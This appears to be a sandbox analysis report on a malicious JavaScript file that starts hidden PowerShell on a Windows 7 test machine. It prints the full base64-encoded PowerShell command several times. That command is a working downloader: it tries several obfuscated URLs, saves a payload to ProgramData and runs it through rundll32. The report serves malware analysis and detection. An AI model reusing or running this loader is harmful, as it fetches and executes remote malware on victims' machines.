Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 16, 2023, 10:33 a.m. | May 16, 2023, 10:35 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan
2148-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="
2296
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEA